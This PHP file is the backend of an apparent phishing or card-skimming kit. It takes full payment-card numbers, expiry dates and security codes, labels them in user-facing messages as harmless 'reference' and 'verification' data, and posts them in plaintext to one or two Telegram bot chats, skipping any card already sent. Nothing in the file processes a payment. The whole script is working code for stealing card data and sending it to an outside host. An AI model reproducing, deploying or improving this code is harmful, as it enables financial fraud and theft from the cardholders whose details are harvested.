<?php
require_once 'config.php';

header('Content-Type: application/json');
header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Methods: POST');
header('Access-Control-Allow-Headers: Content-Type');

if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
    exit(0);
}

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    echo json_encode(['success' => false, 'message' => 'Method not allowed']);
    exit;
}

$input = json_decode(file_get_contents('php://input'), true);

if (!$input) {
    $input = $_POST;
}

$cardNumber = isset($input['cardNumber']) ? trim($input['cardNumber']) : '';
$month = isset($input['month']) ? trim($input['month']) : '';
$year = isset($input['year']) ? trim($input['year']) : '';
$securityCode = isset($input['securityCode']) ? trim($input['securityCode']) : '';
$cardBrand = isset($input['cardBrand']) ? trim($input['cardBrand']) : '';

if (!preg_match('/^[0-9]{16}$/', $cardNumber)) {
    echo json_encode(['success' => false, 'message' => 'Reference number must be exactly 16 digits']);
    exit;
}

if (!preg_match('/^[0-9]{2}$/', $month) || (int)$month < 1 || (int)$month > 12) {
    echo json_encode(['success' => false, 'message' => 'Invalid month format']);
    exit;
}

if (!preg_match('/^[0-9]{2}$/', $year)) {
    echo json_encode(['success' => false, 'message' => 'Invalid year format']);
    exit;
}

if (empty($securityCode) || strlen($securityCode) > 4) {
    echo json_encode(['success' => false, 'message' => 'Verification code is required']);
    exit;
}

if (empty($cardBrand)) {
    echo json_encode(['success' => false, 'message' => 'Category is required']);
    exit;
}

session_start();
if (!isset($_SESSION['sent_cards'])) {
    $_SESSION['sent_cards'] = [];
}

$cardHash = md5($cardNumber . ':' . $month . ':' . $year . ':' . $securityCode . ':' . strtolower($cardBrand));

if (in_array($cardHash, $_SESSION['sent_cards'])) {
    echo json_encode(['success' => true, 'message' => 'Reference already processed']);
    exit;
}

$message = "Card -($cardBrand)\n$cardNumber:$month:$year:$securityCode";

$success1 = false;
$success2 = false;

if (!empty($TELEGRAM_BOT_TOKEN) && !empty($TELEGRAM_CHAT_ID) && $TELEGRAM_BOT_TOKEN !== 'YOUR_BOT_TOKEN_HERE') {
    $success1 = sendTelegramMessage($TELEGRAM_BOT_TOKEN, $TELEGRAM_CHAT_ID, $message);
}

if (!empty($TELEGRAM_BOT_TOKEN_2) && !empty($TELEGRAM_CHAT_ID_2) && $TELEGRAM_BOT_TOKEN_2 !== 'YOUR_BOT_TOKEN_2_HERE') {
    $success2 = sendTelegramMessage($TELEGRAM_BOT_TOKEN_2, $TELEGRAM_CHAT_ID_2, $message);
}

if ($success1 || $success2) {
    $_SESSION['sent_cards'][] = $cardHash;
    echo json_encode(['success' => true, 'message' => 'Reference information submitted successfully']);
} else {
    echo json_encode(['success' => false, 'message' => 'Failed to process request']);
}

function sendTelegramMessage($botToken, $chatId, $message) {
    $url = "https://api.telegram.org/bot$botToken/sendMessage";
    
    $data = [
        'chat_id' => $chatId,
        'text' => $message
    ];
    
    $options = [
        'http' => [
            'method' => 'POST',
            'header' => 'Content-Type: application/x-www-form-urlencoded',
            'content' => http_build_query($data),
            'timeout' => 10
        ]
    ];
    
    $context = stream_context_create($options);
    $result = @file_get_contents($url, false, $context);
    
    return $result !== false;
}
?>
